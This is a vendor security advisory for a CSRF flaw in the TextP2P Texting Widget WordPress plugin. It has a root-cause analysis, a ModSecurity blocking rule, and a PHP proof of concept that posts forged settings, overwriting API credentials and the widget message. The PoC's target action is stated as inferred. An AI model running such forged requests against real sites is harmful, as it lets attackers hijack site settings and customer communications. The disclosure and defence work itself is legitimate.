Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 23, 2026

CVE-2026-4133: TextP2P Texting Widget <= 1.7 – Cross-Site Request Forgery to Settings Update (textp2p-texting-widget)

CVE ID CVE-2026-4133
Plugin textp2p-texting-widget
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.7
Patched Version
Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4133 (metadata-based): This is a Cross-Site Request Forgery (CSRF) vulnerability in the TextP2P Texting Widget plugin for WordPress, affecting all versions up to and including 1.7. The vulnerability allows unauthenticated attackers to modify all plugin settings by tricking a site administrator into clicking a malicious link. The CVSS score of 4.3 (Medium) reflects the need for user interaction but the low confidentiality and integrity impact.

The root cause, inferred from the CWE-352 (CSRF) classification and the vulnerability description, is the complete absence of nonce validation in the settings update handler. The description specifically notes that the form at line 314 lacks a wp_nonce_field() call, and the POST handler at line 7 does not call check_admin_referer() or wp_verify_nonce(). This is a confirmed finding from the Wordfence threat intelligence report. The imTextP2POptionPage() function processes all settings updates without verifying the request originated from the legitimate WordPress admin interface. This pattern is common in plugins that implement settings pages without following WordPress security best practices.

To exploit this vulnerability, an attacker crafts a malicious HTML page or link that submits a forged POST request to the WordPress admin endpoint where the plugin processes settings. The likely target URL is either /wp-admin/admin-post.php?action=imTextP2POptionPage or a direct admin-ajax.php call. The attacker includes parameters corresponding to plugin settings like chat widget titles, messages, API credentials, colors, and reCAPTCHA configuration. The attacker then tricks a logged-in administrator into visiting the malicious page or clicking the link. Since the plugin does not validate a nonce, the request is processed as if the administrator made it intentionally. The attack vector is network-based (AV:N) with low attack complexity (AC:L) and requires no privileges (PR:N) but does require user interaction (UI:R).

The remediation requires adding WordPress CSRF protection to the settings update handler. The developer should add a wp_nonce_field() to the settings form and call check_admin_referer() or wp_verify_nonce() before processing POST data. This follows standard WordPress patterns for admin page security. Since no patched version is available, site administrators should consider disabling the plugin or using a Web Application Firewall (WAF) rule to block unauthorized settings changes until a fix is released.

The impact of successful exploitation is limited to unauthorized modification of plugin settings (C:N/I:L/A:N). An attacker could redirect chat widget traffic to their own infrastructure by changing API credentials, display malicious content through modified widget titles and messages, disable reCAPTCHA protection to allow spam, or alter widget appearance. The attacker cannot steal data directly from the database or escalate privileges. However, altering API credentials could enable man-in-the-middle attacks on customer communications.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity 
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" "id:20264133,phase:2,deny,status:403,chain,msg:'CVE-2026-4133 CSRF attempt on TextP2P Texting Widget settings update',severity:'CRITICAL',tag:'CVE-2026-4133'"
SecRule ARGS_POST:action "@streq imTextP2POptionPage" "chain"
SecRule REQUEST_METHOD "@streq POST" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4133 - TextP2P Texting Widget <= 1.7 Cross-Site Request Forgery to Settings Update

// Configuration
$target_url = 'http://example.com/wp-admin/admin-post.php'; // Target WordPress admin URL
$action = 'imTextP2POptionPage'; // Inferred action name based on plugin function imTextP2POptionPage()

// Malicious settings payload
$payload = array(
    'action' => $action,
    'imtextp2p_chat_title' => 'Hacked Chat Support',
    'imtextp2p_welcome_message' => 'Your site has been compromised. Contact attacker@example.com for help.',
    'imtextp2p_api_key' => 'EVILAPIKEY123456',
    'imtextp2p_api_secret' => 'EVILAPISECRET7890',
    'imtextp2p_primary_color' => '#ff0000',
    'imtextp2p_recaptcha_site_key' => '6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI', // Invalid key
    'imtextp2p_recaptcha_secret_key' => '6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe'
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=admin_session_cookie'); // Requires admin cookie
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 302 || $http_code == 200) {
    echo "[+] CSRF attack likely succeeded. Plugin settings updated.n";
    echo "[+] HTTP Status: " . $http_code . "n";
} else {
    echo "[-] Attack might have failed. HTTP Status: " . $http_code . "n";
}

curl_close($ch);

// Note: This PoC requires the attacker to trick a logged-in WordPress administrator into triggering this request.
// In a real attack, the payload would be delivered via a malicious link or HTML form.
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School